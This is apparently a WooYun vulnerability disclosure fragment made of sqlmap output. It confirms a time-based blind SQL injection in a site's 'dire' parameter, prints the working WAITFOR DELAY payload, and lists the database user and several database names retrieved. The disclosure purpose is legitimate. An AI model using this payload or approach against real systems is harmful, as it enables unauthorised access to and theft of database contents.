WooYun.org

当前用户
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: dire
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: indexid=395&indexclass=2&sort=fld_adddate&dire=desc'; WAITFOR DELAY '0:0:5' --
---
[22:27:07] [INFO] testing Microsoft SQL Server
[22:27:07] [INFO] confirming Microsoft SQL Server
[22:27:07] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 4.0.30319
back-end DBMS: Microsoft SQL Server 2005
[22:27:07] [INFO] fetching current user
[22:27:07] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[22:27:17] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[22:27:28] [INFO] adjusting time delay to 1 second due to good response times
icuser
current user: 'icuser'
有14个库，涉及数据不少，象征性跑两个证明一下，比较时间盲注太费时了
[22:52:37] [INFO] resumed: DB_INDEXCLOUD
[22:52:37] [INFO] resumed: DB_INDEXCYOUD_BAK
[22:52:37] [INFO] resumed: DB_INDEXCLOUD_DATA
[22:52:37] [INFO] resumed: DB_INDEXCLOUD_FFG_DATA
[22:52:37] [INFO] resumed: DB_SELECT_STOCK_DATA
太尼玛蛋疼了。。。